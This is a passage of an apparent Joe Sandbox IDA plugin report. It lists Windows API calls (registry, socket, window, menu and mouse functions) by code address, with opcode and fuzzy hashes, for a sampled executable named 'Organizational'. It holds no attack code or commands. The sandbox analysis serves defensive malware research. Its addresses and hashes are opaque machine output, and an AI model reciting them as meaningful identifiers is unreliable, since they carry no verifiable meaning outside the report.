                                                          • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 002D79D6
                                                          • DrawMenuBar.USER32 ref: 002D79E9
                                                          Strings
                                                          Similarity
                                                          • API ID: Menu$Item$DrawInfoInsert_memset
                                                          • String ID: 0
                                                          • API String ID: 3866635326-4108050209
                                                          • Opcode ID: af77181c3527dc4584e11f6bf85cd518cb6f8c7aa2aa63cfe7ab32f704fadb5c
                                                          • Instruction ID: 25e59e9247d19593e1145cd5d37db2c7dc73da1c0010b5c73b3b8c29a4adb14b
                                                          • Opcode Fuzzy Hash: af77181c3527dc4584e11f6bf85cd518cb6f8c7aa2aa63cfe7ab32f704fadb5c
                                                          • Instruction Fuzzy Hash: 9F417C72A14249EFDB10CF54D894EEABBF9FB09310F04816AE9459B390D774AD60CF90
                                                          APIs
                                                          • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?), ref: 002D1631
                                                          • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 002D165B
                                                          • FreeLibrary.KERNEL32(00000000), ref: 002D1712
                                                            • Part of subcall function 002D1602: RegCloseKey.ADVAPI32(?), ref: 002D1678
                                                            • Part of subcall function 002D1602: FreeLibrary.KERNEL32(?), ref: 002D16CA
                                                            • Part of subcall function 002D1602: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 002D16ED
                                                          • RegDeleteKeyW.ADVAPI32(?,?), ref: 002D16B5
                                                          Similarity
                                                          • API ID: EnumFreeLibrary$CloseDeleteOpen
                                                          • String ID:
                                                          • API String ID: 395352322-0
                                                          • Opcode ID: 0b946afce9cee87d82ffea9a5ac517b73d4b1c7c99f298c2b32049b7e18ce554
                                                          • Instruction ID: 68bc27968daad8b55649f22677f20905df33deea5e04febdd43ec2336b0715e2
                                                          • Opcode Fuzzy Hash: 0b946afce9cee87d82ffea9a5ac517b73d4b1c7c99f298c2b32049b7e18ce554
                                                          • Instruction Fuzzy Hash: C3313071910109BFEB14DF90DCC9EFEB7BCEF08301F14016AE505A6650D7749E959BA0
                                                          APIs
                                                          • SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 002D6911
                                                          • GetWindowLongW.USER32(016F5700,000000F0), ref: 002D6944
                                                          • GetWindowLongW.USER32(016F5700,000000F0), ref: 002D6979
                                                          • SendMessageW.USER32(?,000000F1,00000000,00000000), ref: 002D69AB
                                                          • SendMessageW.USER32(?,000000F1,00000001,00000000), ref: 002D69D5
                                                          • GetWindowLongW.USER32(?,000000F0), ref: 002D69E6
                                                          • SetWindowLongW.USER32(?,000000F0,00000000), ref: 002D6A00
                                                          Similarity
                                                          • API ID: LongWindow$MessageSend
                                                          • String ID:
                                                          • API String ID: 2178440468-0
                                                          • Opcode ID: 43ab3a994c4bf020e18055768e9c26724a4fce74a9b6b78c4061b34268eee209
                                                          • Instruction ID: de1ab71658e489c6e8c9aa26b212ed396d74698cf6cb0c0371d168744c40951a
                                                          • Opcode Fuzzy Hash: 43ab3a994c4bf020e18055768e9c26724a4fce74a9b6b78c4061b34268eee209
                                                          • Instruction Fuzzy Hash: F1311430654192AFDB21CF18DCD9FA537E9EB4A710F1841A5F5148F2B1CB71ACA0DB50
                                                          APIs
                                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 002AE2CA
                                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 002AE2F0
                                                          • SysAllocString.OLEAUT32(00000000), ref: 002AE2F3
                                                          • SysAllocString.OLEAUT32(?), ref: 002AE311
                                                          • SysFreeString.OLEAUT32(?), ref: 002AE31A
                                                          • StringFromGUID2.OLE32(?,?,00000028), ref: 002AE33F
                                                          • SysAllocString.OLEAUT32(?), ref: 002AE34D
                                                          Similarity
                                                          • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                          • String ID:
                                                          • API String ID: 3761583154-0
                                                          • Opcode ID: 91283580663ef9bca96a62e4e19a77b1727a73f309a3607fe6a7bf25098384a8
                                                          • Instruction ID: 5b42d7b1f3984a7720d80faec0bd1567bc84fe9f6830a5cb491e2f5fa3e75380
                                                          • Opcode Fuzzy Hash: 91283580663ef9bca96a62e4e19a77b1727a73f309a3607fe6a7bf25098384a8
                                                          • Instruction Fuzzy Hash: A9219776615219BF9F10DFA8DCC8CBB77ACEB09360B058165FE18DB250DA70AC968760
                                                          APIs
                                                            • Part of subcall function 002C8475: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 002C84A0
                                                          • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 002C68B1
                                                          • WSAGetLastError.WSOCK32(00000000), ref: 002C68C0
                                                          • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 002C68F9
                                                          • connect.WSOCK32(00000000,?,00000010), ref: 002C6902
                                                          • WSAGetLastError.WSOCK32 ref: 002C690C
                                                          • closesocket.WSOCK32(00000000), ref: 002C6935
                                                          • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 002C694E
                                                          Similarity
                                                          • API ID: ErrorLastioctlsocket$closesocketconnectinet_addrsocket
                                                          • String ID:
                                                          • API String ID: 910771015-0
                                                          • Opcode ID: 82d0fa9fec75281941796bc1831d5aea1eb9e310b07c6b6dd2a127b4c2be1799
                                                          • Instruction ID: c3604696eca3eb407c095dea83784a66f5f53e7e74d51eebfd0f0a7bb0e42f94
                                                          • Opcode Fuzzy Hash: 82d0fa9fec75281941796bc1831d5aea1eb9e310b07c6b6dd2a127b4c2be1799
                                                          • Instruction Fuzzy Hash: 4531C471220104AFDB10AF64DCC9FB977B9EB44725F04422DFD05AB291CBB0AC558FA1
                                                          APIs
                                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 002AE3A5
                                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 002AE3CB
                                                          • SysAllocString.OLEAUT32(00000000), ref: 002AE3CE
                                                          • SysAllocString.OLEAUT32 ref: 002AE3EF
                                                          • SysFreeString.OLEAUT32 ref: 002AE3F8
                                                          • StringFromGUID2.OLE32(?,?,00000028), ref: 002AE412
                                                          • SysAllocString.OLEAUT32(?), ref: 002AE420
                                                          Similarity
                                                          • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                          • String ID:
                                                          • API String ID: 3761583154-0
                                                          • Opcode ID: 5fcfaed9faf62da4f090b3756fd66ada84f05fd071e3afc4d7acb474d4222446
                                                          • Instruction ID: bd1b44d52239bd5af769164a60fe607d2b9e25498b3f15c4ef756d1b5459f012
                                                          • Opcode Fuzzy Hash: 5fcfaed9faf62da4f090b3756fd66ada84f05fd071e3afc4d7acb474d4222446
                                                          • Instruction Fuzzy Hash: 14218835614105AF9F109FA8DCC8CBE77ECEB0D360B058165F915CB2A0DA70EC928B74
                                                          APIs
                                                            • Part of subcall function 00252111: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 0025214F
                                                            • Part of subcall function 00252111: GetStockObject.GDI32(00000011), ref: 00252163
                                                            • Part of subcall function 00252111: SendMessageW.USER32(00000000,00000030,00000000), ref: 0025216D
                                                          • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 002D7C57
                                                          • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 002D7C64
                                                          • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 002D7C6F
                                                          • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 002D7C7E
                                                          • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 002D7C8A
                                                          Strings
                                                          Similarity
                                                          • API ID: MessageSend$CreateObjectStockWindow
                                                          • String ID: Msctls_Progress32
                                                          • API String ID: 1025951953-3636473452
                                                          • Opcode ID: f3b1107c9fd22d06a36aa9cd4ab4768f774c0cce5f6ae5fa0518f47838fdabf0
                                                          • Instruction ID: cb93bb048b0aa5d45dddc16e587f8b89ddb01a16eae674886f4b957b06d6a0d6
                                                          • Opcode Fuzzy Hash: f3b1107c9fd22d06a36aa9cd4ab4768f774c0cce5f6ae5fa0518f47838fdabf0
                                                          • Instruction Fuzzy Hash: C71186B116021DBEEF159F60CC85EE77F5DEF08758F014116BA08A6190D7759C21DBA4
                                                          APIs
                                                          • __init_pointers.LIBCMT ref: 00279D16
                                                            • Part of subcall function 002733B7: EncodePointer.KERNEL32(00000000), ref: 002733BA
                                                            • Part of subcall function 002733B7: __initp_misc_winsig.LIBCMT ref: 002733D5
                                                            • Part of subcall function 002733B7: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 0027A0D0
                                                            • Part of subcall function 002733B7: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 0027A0E4
                                                            • Part of subcall function 002733B7: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 0027A0F7
                                                            • Part of subcall function 002733B7: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 0027A10A
                                                            • Part of subcall function 002733B7: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 0027A11D
                                                            • Part of subcall function 002733B7: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 0027A130
                                                            • Part of subcall function 002733B7: GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 0027A143
                                                            • Part of subcall function 002733B7: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 0027A156
                                                            • Part of subcall function 002733B7: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 0027A169
                                                            • Part of subcall function 002733B7: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 0027A17C
                                                            • Part of subcall function 002733B7: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 0027A18F
                                                            • Part of subcall function 002733B7: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 0027A1A2
                                                            • Part of subcall function 002733B7: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 0027A1B5
                                                            • Part of subcall function 002733B7: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 0027A1C8
                                                            • Part of subcall function 002733B7: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 0027A1DB
                                                            • Part of subcall function 002733B7: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 0027A1EE
                                                          • __mtinitlocks.LIBCMT ref: 00279D1B
                                                          • __mtterm.LIBCMT ref: 00279D24
                                                            • Part of subcall function 00279D8C: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,00279D29,00277EFD,0030CD38,00000014), ref: 00279E86
                                                            • Part of subcall function 00279D8C: _free.LIBCMT ref: 00279E8D
                                                            • Part of subcall function 00279D8C: DeleteCriticalSection.KERNEL32(0R1,?,?,00279D29,00277EFD,0030CD38,00000014), ref: 00279EAF
                                                          • __calloc_crt.LIBCMT ref: 00279D49
                                                          • __initptd.LIBCMT ref: 00279D6B
                                                          • GetCurrentThreadId.KERNEL32 ref: 00279D72
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                           • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmp
                                                           • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmp
                                                           • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmp
                                                           • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmp
                                                           • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: AddressProc$CriticalDeleteSection$CurrentEncodeHandleModulePointerThread__calloc_crt__init_pointers__initp_misc_winsig__initptd__mtinitlocks__mtterm_free
                                                          • String ID:
                                                          • API String ID: 3567560977-0
                                                          • Opcode ID: f66df32ac283941a311e315e87c05f9f4a475bf9a03c89b1b20c400dbf722754
                                                          • Instruction ID: 152aab06d3b2675e24e7c7c2ec22e6a7d32396d45afdee4fc509c3f1eb81cb1e
                                                          • Opcode Fuzzy Hash: f66df32ac283941a311e315e87c05f9f4a475bf9a03c89b1b20c400dbf722754
                                                          • Instruction Fuzzy Hash: A1F0903257A7125AEB357B74BC07A8A26D4DF42B30F20C61AF45CDA0D3EF7088E14991
                                                          APIs
                                                          • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize,00274282,?), ref: 002741D3
                                                          • GetProcAddress.KERNEL32(00000000), ref: 002741DA
                                                          • EncodePointer.KERNEL32(00000000), ref: 002741E6
                                                          • DecodePointer.KERNEL32(00000001,00274282,?), ref: 00274203
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                           • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmp
                                                           • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmp
                                                           • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmp
                                                           • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmp
                                                           • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                                                          • String ID: RoInitialize$combase.dll
                                                          • API String ID: 3489934621-340411864
                                                          • Opcode ID: eb2166227b1c1c0a8d523b2bab705cc1cbf030a7731841e9a69fe22338d17fc3
                                                          • Instruction ID: 43407dfa786b29b7142b81031e90e5bbf33f298f8d535919bb76c1f5d6b69b16
                                                          • Opcode Fuzzy Hash: eb2166227b1c1c0a8d523b2bab705cc1cbf030a7731841e9a69fe22338d17fc3
                                                          • Instruction Fuzzy Hash: ACE0ED705E0781BFDF126F71EC8DB983668A755706F908464B905D90A0CBF540958A00
                                                          APIs
                                                          • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,002741A8), ref: 002742A8
                                                          • GetProcAddress.KERNEL32(00000000), ref: 002742AF
                                                          • EncodePointer.KERNEL32(00000000), ref: 002742BA
                                                          • DecodePointer.KERNEL32(002741A8), ref: 002742D5
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                           • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmp
                                                           • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmp
                                                           • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmp
                                                           • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmp
                                                           • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                                                          • String ID: RoUninitialize$combase.dll
                                                          • API String ID: 3489934621-2819208100
                                                          • Opcode ID: eab3e08b7780806b1f45e0a49a0e2010ec0ccd2af3fcacbf236c88d4bcf9aab0
                                                          • Instruction ID: 034990c92f2dd5291cb32ae2e0dd4f3c4560e0dff416f44309149d5636431d0b
                                                          • Opcode Fuzzy Hash: eab3e08b7780806b1f45e0a49a0e2010ec0ccd2af3fcacbf236c88d4bcf9aab0
                                                          • Instruction Fuzzy Hash: 28E0B6705E1741FBDF139F61BD8DB843AA8F788B02F508169F505DA0A0CBF446B5CA10
                                                          APIs
                                                          • GetClientRect.USER32(?,?), ref: 002521B8
                                                          • GetWindowRect.USER32(?,?), ref: 002521F9
                                                          • ScreenToClient.USER32(?,?), ref: 00252221
                                                          • GetClientRect.USER32(?,?), ref: 00252350
                                                          • GetWindowRect.USER32(?,?), ref: 00252369
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                           • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmp
                                                           • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmp
                                                           • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmp
                                                           • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmp
                                                           • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: Rect$Client$Window$Screen
                                                          • String ID:
                                                          • API String ID: 1296646539-0
                                                          • Opcode ID: 89ac3608caa11f65fa58754f3081ec39d1fc42b2f6c86313ff5ab4d2d5e234b8
                                                          • Instruction ID: f7d6078960d1075f23486f858e201bafc8e21d3c5ad2fa52386b63f773aa827d
                                                          • Opcode Fuzzy Hash: 89ac3608caa11f65fa58754f3081ec39d1fc42b2f6c86313ff5ab4d2d5e234b8
                                                          • Instruction Fuzzy Hash: ADB18F3992024ADBDF10CFA8C4807EDB7B1FF09311F148169ED59EB294DB74A968CB58
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                           • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmp
                                                           • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmp
                                                           • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmp
                                                           • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmp
                                                           • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: _memmove$__itow__swprintf
                                                          • String ID:
                                                          • API String ID: 3253778849-0
                                                          • Opcode ID: c1d4d61aec3e97959054d52700e379228b0f43a147c246075d4bbaf544f73aac
                                                          • Instruction ID: b502a72c49d7a91ad13ae6a153c77358964d46d634691767baa5170b6a4501ee
                                                          • Opcode Fuzzy Hash: c1d4d61aec3e97959054d52700e379228b0f43a147c246075d4bbaf544f73aac
                                                          • Instruction Fuzzy Hash: B061BE3112029AABCF11EF64CC85EFE77A4AF05348F048559FC596B192DB38A865CF50
                                                          APIs
                                                            • Part of subcall function 00261A36: _memmove.LIBCMT ref: 00261A77
                                                            • Part of subcall function 002D147A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,002D040D,?,?), ref: 002D1491
                                                          • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 002D091D
                                                          • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 002D095D
                                                          • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 002D0980
                                                          • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 002D09A9
                                                          • RegCloseKey.ADVAPI32(?,?,00000000), ref: 002D09EC
                                                          • RegCloseKey.ADVAPI32(00000000), ref: 002D09F9
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                           • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmp
                                                           • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmp
                                                           • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmp
                                                           • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmp
                                                           • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue_memmove
                                                          • String ID:
                                                          • API String ID: 4046560759-0
                                                          • Opcode ID: 3650227adf0a36e766ec39e4ec9b487a88470ff68cf70c1202be019c3afb64fd
                                                          • Instruction ID: 1d9154f0e8b1486586325ab93ec316baaa46d99c04cb7e96fe7365754e38bc02
                                                          • Opcode Fuzzy Hash: 3650227adf0a36e766ec39e4ec9b487a88470ff68cf70c1202be019c3afb64fd
                                                          • Instruction Fuzzy Hash: BA518A31128241AFD700EF64C895E6ABBE8FF84714F04491EF989872A2DB71ED65CF52
                                                          APIs
                                                          • VariantInit.OLEAUT32(?), ref: 002AF6A2
                                                          • VariantClear.OLEAUT32(00000013), ref: 002AF714
                                                          • VariantClear.OLEAUT32(00000000), ref: 002AF76F
                                                          • _memmove.LIBCMT ref: 002AF799
                                                          • VariantClear.OLEAUT32(?), ref: 002AF7E6
                                                          • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 002AF814
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                           • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmp
                                                           • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmp
                                                           • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmp
                                                           • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmp
                                                           • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: Variant$Clear$ChangeInitType_memmove
                                                          • String ID:
                                                          • API String ID: 1101466143-0
                                                          • Opcode ID: 606f6d548db4981b00a4136b476fe74932c8944d0e28987c1f980721be570b3b
                                                          • Instruction ID: bf71cc9944d30b73bffcb6332bca7501e3f528503af556384f5ce59a4669a67b
                                                          • Opcode Fuzzy Hash: 606f6d548db4981b00a4136b476fe74932c8944d0e28987c1f980721be570b3b
                                                          • Instruction Fuzzy Hash: FE5179B5A10209EFCB14CF58D884AAAB7B8FF4D314F15816AE959DB340E734E951CFA0
                                                          APIs
                                                          • _memset.LIBCMT ref: 002B29FF
                                                          • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 002B2A4A
                                                          • IsMenu.USER32(00000000), ref: 002B2A6A
                                                          • CreatePopupMenu.USER32 ref: 002B2A9E
                                                          • GetMenuItemCount.USER32(000000FF), ref: 002B2AFC
                                                          • InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 002B2B2D
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                           • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmp
                                                           • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmp
                                                           • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmp
                                                           • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmp
                                                           • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: Menu$Item$CountCreateInfoInsertPopup_memset
                                                          • String ID:
                                                          • API String ID: 3311875123-0
                                                          • Opcode ID: 704dc4ab8f872c4a18ce28ce1b30ef2138404176dfde435d5d11294965a825a3
                                                          • Instruction ID: 3fac58ade958870c1923276570d6c63a087c354c98c21f079b6263bf6b2fa801
                                                          • Opcode Fuzzy Hash: 704dc4ab8f872c4a18ce28ce1b30ef2138404176dfde435d5d11294965a825a3
                                                          • Instruction Fuzzy Hash: E451C07062034ADBDF25CF68D888BEEBBF4AF14398F144119E8519B291DBB09968CB51
                                                          APIs
                                                            • Part of subcall function 002529E2: GetWindowLongW.USER32(?,000000EB), ref: 002529F3
                                                          • BeginPaint.USER32(?,?,?,?,?,?), ref: 00251B76
                                                          • GetWindowRect.USER32(?,?), ref: 00251BDA
                                                          • ScreenToClient.USER32(?,?), ref: 00251BF7
                                                          • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00251C08
                                                          • EndPaint.USER32(?,?), ref: 00251C52
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                           • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmp
                                                           • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmp
                                                           • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmp
                                                           • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmp
                                                           • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: PaintWindow$BeginClientLongRectScreenViewport
                                                          • String ID:
                                                          • API String ID: 1827037458-0
                                                          • Opcode ID: 910c6e0548d7c50670dc7f85a668bd57dba3c19ca93886501194ae5a2941f1b0
                                                          • Instruction ID: 22635534a1a2fc1166d4952bc87a0658f99727188a9f90530ce7117e626db3be
                                                          • Opcode Fuzzy Hash: 910c6e0548d7c50670dc7f85a668bd57dba3c19ca93886501194ae5a2941f1b0
                                                          • Instruction Fuzzy Hash: DD411130114301AFD711DF24CCC9FBA7BF8EB49326F140669F9948B2A1C7719869DB62
                                                          APIs
                                                          • ShowWindow.USER32(003177B0,00000000,016F5700,?,?,003177B0,?,002DBC1A,?,?), ref: 002DBD84
                                                          • EnableWindow.USER32(?,00000000), ref: 002DBDA8
                                                          • ShowWindow.USER32(003177B0,00000000,016F5700,?,?,003177B0,?,002DBC1A,?,?), ref: 002DBE08
                                                          • ShowWindow.USER32(?,00000004,?,002DBC1A,?,?), ref: 002DBE1A
                                                          • EnableWindow.USER32(?,00000001), ref: 002DBE3E
                                                          • SendMessageW.USER32(?,0000130C,?,00000000), ref: 002DBE61
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                           • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmp
                                                           • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmp
                                                           • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmp
                                                           • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmp
                                                           • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: Window$Show$Enable$MessageSend
                                                          • String ID:
                                                          • API String ID: 642888154-0
                                                          • Opcode ID: 7d231e9e5578a4b38de31eb02753dcda94775168325f6a58be2cea2e6ca232ea
                                                          • Instruction ID: 063dd12e11008ff03761e7b72ea95d9ab5481e3b1b773a083a099a87dd5eb674
                                                          • Opcode Fuzzy Hash: 7d231e9e5578a4b38de31eb02753dcda94775168325f6a58be2cea2e6ca232ea
                                                          • Instruction Fuzzy Hash: 3E416F34614145EFDB22CF14C499B947BF2FF09714F5941AAEA488F3A2C771AC66CB50
                                                          APIs
                                                          • GetForegroundWindow.USER32(?,?,?,?,?,?,002C550C,?,?,00000000,00000001), ref: 002C7796
                                                            • Part of subcall function 002C406C: GetWindowRect.USER32(?,?), ref: 002C407F
                                                          • GetDesktopWindow.USER32 ref: 002C77C0
                                                          • GetWindowRect.USER32(00000000), ref: 002C77C7
                                                          • mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 002C77F9
                                                            • Part of subcall function 002B57FF: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 002B5877
                                                          • GetCursorPos.USER32(?), ref: 002C7825
                                                          • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 002C7883
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                           • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmp
